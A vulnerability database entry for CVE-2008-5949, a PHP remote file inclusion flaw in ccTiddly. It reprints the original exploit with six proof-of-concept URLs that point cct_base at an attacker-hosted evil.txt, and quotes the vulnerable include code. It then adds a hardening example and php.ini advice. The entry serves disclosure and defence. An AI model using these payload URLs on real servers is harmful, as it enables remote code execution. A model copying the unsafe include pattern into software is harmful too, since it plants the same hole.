tiddlywiki ccTiddly PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1116939    Vulnerability type: Code injection
Published: 2008-12-04    Updated: 2009-01-26
CVE: CVE-2008-5949    CNNVD ID: CNNVD-200901-306
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/7336
https://cxsecurity.com/issue/WLB-2009010197
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-306
|Vulnerability Details
Multiple PHP remote file inclusion vulnerabilities exist in ccTiddly 1.7.4 and 1.7.6. A remote attacker can execute arbitrary PHP code by supplying a URL in the cct_base parameter of (1) index.php, (2) handle/proxy.php, (3) includes/header.php, (4) includes/include.php, (5) includes/workspace.php, and (6) plugins/RSS/files/rss.php.
|Exploit
/*

	$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $

	ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
	found by cOndemned
	
	download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
	
	Probably prior versions are vulnerable too...

	Greetz: ZaBeaTy, str0ke, TBH, Avantura

*/


0x01 :
	file : 
		/index.php
	poc : 
		http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
	source :  

		18.	//includes
		19.	if(!isset($cct_base))
		20.		$cct_base = "";
		21.
		22.	include_once($cct_base."includes/header.php");
		23.	include_once($cct_base."includes/login.php");	
	
0x02 :

	file :
		/handle/proxy.php
	poc :
		http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	if(!isset($cct_base)) 
		4.		$cct_base= "../";
		5.	include_once($cct_base."includes/header.php");
		6.	include_once($cct_base."includes/config.php");

0x03 :

	file :
		/includes/header.php
	poc :
		http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
	source :

		5.	if(!isset($cct_base)) 
		6.		$cct_base= "";
		7.	include_once($cct_base."includes/functions.php");
		8.	include_once($cct_base."includes/config.php");
		9.	include_once($cct_base."includes/pluginLoader.php");
		10.	include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
		11.	//include is used because language file is included once in config.php file
		12.	include_once($cct_base."includes/tiddler.php");
		13.	include_once($cct_base."includes/user.php");

0x04 :

	file :
		/includes/include.php
	poc :
		http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/ccAssignments.php");

0x05 :

	file :
		/includes/workspace.php	
	poc :
		http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
	source :
		3.	include_once($cct_base."includes/header.php");
		4.	include_once($cct_base."includes/user.php");
		5.	include_once($cct_base."includes/tiddler.php");

0x06 :

	file :
		/plugins/RSS/files/rss.php
	poc :
		http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/header.php");
		
EoF.

# milw0rm.com [2008-12-04]
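The root cause in every excerpt above is the same: a variable that a request can populate (`$cct_base`, via register_globals) is concatenated into `include_once`, so a URL becomes the include target. The following is an added hardening example, not ccTiddly's own code; it assumes the helper lives in the application root next to `includes/`, fixes the base directory from `__DIR__`, and validates each include target before use.

```php
<?php
// Added hardening example (not ccTiddly's code). It replaces the
// "if(!isset($cct_base)) $cct_base = ''; include_once($cct_base.'includes/...')"
// pattern from the advisory with an include helper whose base directory is
// fixed at install time and whose targets are validated before inclusion.
// Assumed layout: this file sits in the application root, next to includes/.

declare(strict_types=1);

// Base directory derived from this script's own location, never from a
// request variable (with register_globals on, ?cct_base=... would set $cct_base).
define('CCT_BASE', rtrim(realpath(__DIR__), DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR);

/**
 * Include $relative only if it is a plain relative .php path made of safe
 * characters and resolves to a file that still lies inside CCT_BASE.
 * A URL ("http://attacker/evil.txt?"), a stream wrapper ("php://input") and
 * a traversal ("../../etc/passwd") each fail one of the checks below.
 */
function cct_include(string $relative): void
{
    if (preg_match('~\A[A-Za-z0-9_][A-Za-z0-9_./-]*\.php\z~', $relative) !== 1
        || strpos($relative, '..') !== false) {
        throw new RuntimeException("rejected include target: $relative");
    }
    $resolved = realpath(CCT_BASE . $relative);   // false if the file does not exist
    if ($resolved === false || strncmp($resolved, CCT_BASE, strlen(CCT_BASE)) !== 0) {
        throw new RuntimeException("include target outside base dir: $relative");
    }
    include_once $resolved;
}

/**
 * header.php in the advisory builds the language path from
 * $tiddlyCfg['pref']['language']; constrain that tag to a short token first.
 */
function cct_language_file(string $lang): string
{
    if (preg_match('~\A[a-z]{2,3}(-[A-Za-z]{2,4})?\z~', $lang) !== 1) {
        $lang = 'en';   // malformed or unknown tag: fall back, never include it
    }
    return 'lang/' . $lang . '/language.php';
}

// Equivalent of the advisory's index.php lines 22-23, with no $cct_base at all.
cct_include('includes/header.php');
cct_include('includes/login.php');
cct_include(cct_language_file($tiddlyCfg['pref']['language'] ?? 'en'));
```

Independently of the code change, keep `allow_url_include=Off` and `register_globals=Off` in php.ini: those two settings are what make the URL payloads in the advisory reachable in the first place.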
|References

Source: XF
Name: cctiddly-cctbase-file-include(47072)
Link: http://xforce.iss.net/xforce/xfdb/47072
Source: BID
Name: 32631
Link: http://www.securityfocus.com/bid/32631
Source: MILW0RM
Name: 7336
Link: http://www.milw0rm.com/exploits/7336
Source: SECUNIA
Name: 32995
Link: http://secunia.com/advisories/32995